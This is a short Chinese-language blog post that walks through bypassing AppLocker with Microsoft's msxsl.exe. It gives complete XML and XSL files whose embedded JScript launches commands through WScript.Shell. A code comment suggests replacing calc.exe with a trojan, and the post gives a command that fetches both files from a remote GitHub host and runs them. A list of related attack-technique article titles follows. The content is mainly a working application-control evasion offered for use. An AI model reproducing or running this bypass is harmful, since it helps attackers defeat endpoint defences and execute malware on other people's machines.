利用MSXSL.exe绕过AppLocker应用程序控制策略
应用程序 利用 exe 绕过
2023-09-14 09:00:03 时间
1.需要用到微软工具MSXSL.exe,msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaScript进而执行系统命令,其下载地址为:
https://www.microsoft.com/en-us/download/confirmation.aspx?id=21714
2.执行该工具需要用到2个文件,分别为XML及XSL文件,其命令如下:
msxsl.exe test.xml exec.xsl
test.xml:
<?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="exec.xsl" ?> <customers> <customer> <name>Microsoft</name> </customer> </customers>
exec.xsl
<?xml version='1.0'?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://mycompany.com/mynamespace"> <msxsl:script language="JScript" implements-prefix="user"> function xml(nodelist) { var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe"); //这里可以改造为执行你的木马文件如: // var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & shell.exe"); return nodelist.nextNode().xml; } </msxsl:script> <xsl:template match="/"> <xsl:value-of select="user:xml(.)"/> </xsl:template> </xsl:stylesheet>
3.最终执行结果为:
4.也可以远程执行:
msxsl.exe https://raw.githubusercontent.com/backlion/demo/master/test.xml https://raw.githubusercontent.com/backlion/demo/master/exec.xsl
相关文章
- L17 怎么向应用程序商店提交应用
- 利用PHP应用程序中的远程文件包含(RFI)并绕过远程URL包含限制
- WCF 在应用程序级别之外使用注册为 allowDefinition='MachineToApplication' 的节是错误的。
- 手机 无法转移到SD卡 Andriod 导出应用程序
- Tk应用程序之pack界面布局
- VC++通过修改manifest文件来解决Vista/Win7/Win8下应用程序兼容性问题(附源码)
- 常见的windows下无文件落地攻击手法——主要讨论了powershell脚本、HTA是HTML Application的缩写(HTML应用程序)、xml中利用COM组件、certutil下载然后调用Dcom组件执行恶意代码、msxsl.exe是微软用于命令行下处理XSL的可以执行JavaScript执行系统命令
- 【Qt】通过共享内存实现应用程序的单实例检查
- 【构建ML驱动的应用程序】第 11 章 :监控和更新模型
- 【构建ML驱动的应用程序】第 9 章 :选择部署选项
- 【Apache Spark 】第 7 章优化和调优 Spark 应用程序